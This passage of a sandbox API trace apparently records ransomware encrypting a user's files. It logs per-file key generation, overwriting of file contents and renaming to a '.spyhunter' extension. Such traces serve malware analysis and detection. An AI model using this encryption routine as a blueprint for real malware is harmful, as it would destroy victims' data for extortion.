GetProcessHeap () returned 0x2c0000 [0148.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.475] GetProcessHeap () returned 0x2c0000 [0148.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f63d68 | out: hHeap=0x2c0000) returned 1 [0148.475] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248efb0 | out: pbBuffer=0x248efb0) returned 1 [0148.475] GetProcessHeap () returned 0x2c0000 [0148.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.475] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248efa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248efa8*=0x30) returned 1 [0148.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.476] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0148.476] StrStrW (lpFirst="Microsoft At Work.url", lpSrch=".txt") returned 0x0 [0148.476] GetProcessHeap () returned 0x2c0000 [0148.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.476] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef6c*=0x85, lpOverlapped=0x0) returned 1 [0148.476] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.476] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248ef6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef6c*=0x85, lpOverlapped=0x0) returned 1 [0148.477] GetProcessHeap () returned 0x2c0000 [0148.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.477] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.477] WriteFile (in: hFile=0x9c, lpBuffer=0x248efac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef6c, lpOverlapped=0x0 | out: lpBuffer=0x248efac*, lpNumberOfBytesWritten=0x248ef6c*=0x4, lpOverlapped=0x0) returned 1 [0148.477] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef6c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef6c*=0x30, lpOverlapped=0x0) returned 1 [0148.477] CloseHandle (hObject=0x9c) returned 1 [0148.477] GetProcessHeap () returned 0x2c0000 [0148.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.477] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.spyhunter") returned 94 [0148.477] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.spyhunter")) returned 1 [0148.478] GetProcessHeap () returned 0x2c0000 [0148.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.478] GetProcessHeap () returned 0x2c0000 [0148.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.478] GetProcessHeap () returned 0x2c0000 [0148.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3a1a8 | out: hHeap=0x2c0000) returned 1 [0148.478] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248efa8 | out: pbBuffer=0x248efa8) returned 1 [0148.478] GetProcessHeap () returned 0x2c0000 [0148.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.478] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248efa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248efa0*=0x30) returned 1 [0148.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.479] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0148.479] StrStrW (lpFirst="Microsoft At Home.url", lpSrch=".txt") returned 0x0 [0148.479] GetProcessHeap () returned 0x2c0000 [0148.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.479] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef64*=0x85, lpOverlapped=0x0) returned 1 [0148.480] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.480] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248ef64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef64*=0x85, lpOverlapped=0x0) returned 1 [0148.480] GetProcessHeap () returned 0x2c0000 [0148.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.480] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.481] WriteFile (in: hFile=0x9c, lpBuffer=0x248efa4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef64, lpOverlapped=0x0 | out: lpBuffer=0x248efa4*, lpNumberOfBytesWritten=0x248ef64*=0x4, lpOverlapped=0x0) returned 1 [0148.481] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef64, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef64*=0x30, lpOverlapped=0x0) returned 1 [0148.481] CloseHandle (hObject=0x9c) returned 1 [0148.481] GetProcessHeap () returned 0x2c0000 [0148.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.481] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.spyhunter") returned 94 [0148.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.spyhunter")) returned 1 [0148.482] GetProcessHeap () returned 0x2c0000 [0148.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.482] GetProcessHeap () returned 0x2c0000 [0148.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.482] GetProcessHeap () returned 0x2c0000 [0148.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3a0b0 | out: hHeap=0x2c0000) returned 1 [0148.482] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248efa8 | out: pbBuffer=0x248efa8) returned 1 [0148.482] GetProcessHeap () returned 0x2c0000 [0148.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.483] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248efa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248efa0*=0x30) returned 1 [0148.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.483] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0148.483] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch=".txt") returned 0x0 [0148.483] GetProcessHeap () returned 0x2c0000 [0148.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.483] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef64*=0x85, lpOverlapped=0x0) returned 1 [0148.484] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.484] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248ef64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef64*=0x85, lpOverlapped=0x0) returned 1 [0148.484] GetProcessHeap () returned 0x2c0000 [0148.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.484] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.484] WriteFile (in: hFile=0x9c, lpBuffer=0x248efa4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef64, lpOverlapped=0x0 | out: lpBuffer=0x248efa4*, lpNumberOfBytesWritten=0x248ef64*=0x4, lpOverlapped=0x0) returned 1 [0148.484] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef64, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef64*=0x30, lpOverlapped=0x0) returned 1 [0148.485] CloseHandle (hObject=0x9c) returned 1 [0148.485] GetProcessHeap () returned 0x2c0000 [0148.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.485] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.spyhunter") returned 101 [0148.485] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.spyhunter")) returned 1 [0148.485] GetProcessHeap () returned 0x2c0000 [0148.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.485] GetProcessHeap () returned 0x2c0000 [0148.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.486] GetProcessHeap () returned 0x2c0000 [0148.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46728 | out: hHeap=0x2c0000) returned 1 [0148.486] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248efa0 | out: pbBuffer=0x248efa0) returned 1 [0148.486] GetProcessHeap () returned 0x2c0000 [0148.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.486] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef98*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef98*=0x30) returned 1 [0148.486] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.486] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 81 [0148.486] StrStrW (lpFirst="IE Add-on site.url", lpSrch=".txt") returned 0x0 [0148.486] GetProcessHeap () returned 0x2c0000 [0148.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.486] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef5c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef5c*=0x85, lpOverlapped=0x0) returned 1 [0148.487] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.487] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x248ef5c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef5c*=0x85, lpOverlapped=0x0) returned 1 [0148.487] GetProcessHeap () returned 0x2c0000 [0148.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.487] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.487] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef5c, lpOverlapped=0x0 | out: lpBuffer=0x248ef9c*, lpNumberOfBytesWritten=0x248ef5c*=0x4, lpOverlapped=0x0) returned 1 [0148.488] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef5c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef5c*=0x30, lpOverlapped=0x0) returned 1 [0148.488] CloseHandle (hObject=0x9c) returned 1 [0148.488] GetProcessHeap () returned 0x2c0000 [0148.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.488] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.spyhunter") returned 91 [0148.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.spyhunter")) returned 1 [0148.488] GetProcessHeap () returned 0x2c0000 [0148.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.488] GetProcessHeap () returned 0x2c0000 [0148.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.489] GetProcessHeap () returned 0x2c0000 [0148.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f64128 | out: hHeap=0x2c0000) returned 1 [0148.489] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248efa0 | out: pbBuffer=0x248efa0) returned 1 [0148.489] GetProcessHeap () returned 0x2c0000 [0148.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.489] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef98*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef98*=0x30) returned 1 [0148.489] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.489] GetProcessHeap () returned 0x2c0000 [0148.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.489] GetProcessHeap () returned 0x2c0000 [0148.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c38 | out: hHeap=0x2c0000) returned 1 [0148.489] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef98 | out: pbBuffer=0x248ef98) returned 1 [0148.489] GetProcessHeap () returned 0x2c0000 [0148.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.489] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef90*=0x30) returned 1 [0148.489] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.489] GetProcessHeap () returned 0x2c0000 [0148.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.490] GetProcessHeap () returned 0x2c0000 [0148.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d034b0 | out: hHeap=0x2c0000) returned 1 [0148.490] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef98 | out: pbBuffer=0x248ef98) returned 1 [0148.490] GetProcessHeap () returned 0x2c0000 [0148.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.490] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef90*=0x30) returned 1 [0148.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.491] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 67 [0148.491] StrStrW (lpFirst="Favorites.vss", lpSrch=".txt") returned 0x0 [0148.491] GetProcessHeap () returned 0x2c0000 [0148.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.491] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef54, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef54*=0x0, lpOverlapped=0x0) returned 1 [0148.491] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.491] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x248ef54, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef54*=0x0, lpOverlapped=0x0) returned 1 [0148.491] GetProcessHeap () returned 0x2c0000 [0148.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.491] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.491] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef54, lpOverlapped=0x0 | out: lpBuffer=0x248ef94*, lpNumberOfBytesWritten=0x248ef54*=0x4, lpOverlapped=0x0) returned 1 [0148.492] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ef54, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ef54*=0x30, lpOverlapped=0x0) returned 1 [0148.492] CloseHandle (hObject=0x9c) returned 1 [0148.492] GetProcessHeap () returned 0x2c0000 [0148.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.493] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.spyhunter") returned 77 [0148.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.spyhunter")) returned 1 [0148.493] GetProcessHeap () returned 0x2c0000 [0148.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.494] GetProcessHeap () returned 0x2c0000 [0148.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.494] GetProcessHeap () returned 0x2c0000 [0148.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d03650 | out: hHeap=0x2c0000) returned 1 [0148.494] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef90 | out: pbBuffer=0x248ef90) returned 1 [0148.494] GetProcessHeap () returned 0x2c0000 [0148.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.494] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef88*=0x30) returned 1 [0148.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.495] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 65 [0148.495] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0148.495] GetProcessHeap () returned 0x2c0000 [0148.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.495] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ef4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248ef4c*=0xd8, lpOverlapped=0x0) returned 1 [0148.496] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.496] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x248ef4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248ef4c*=0xd8, lpOverlapped=0x0) returned 1 [0148.496] GetProcessHeap () returned 0x2c0000 [0148.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.496] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.496] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ef4c, lpOverlapped=0x0 | out: lpBuffer=0x248ef8c*, 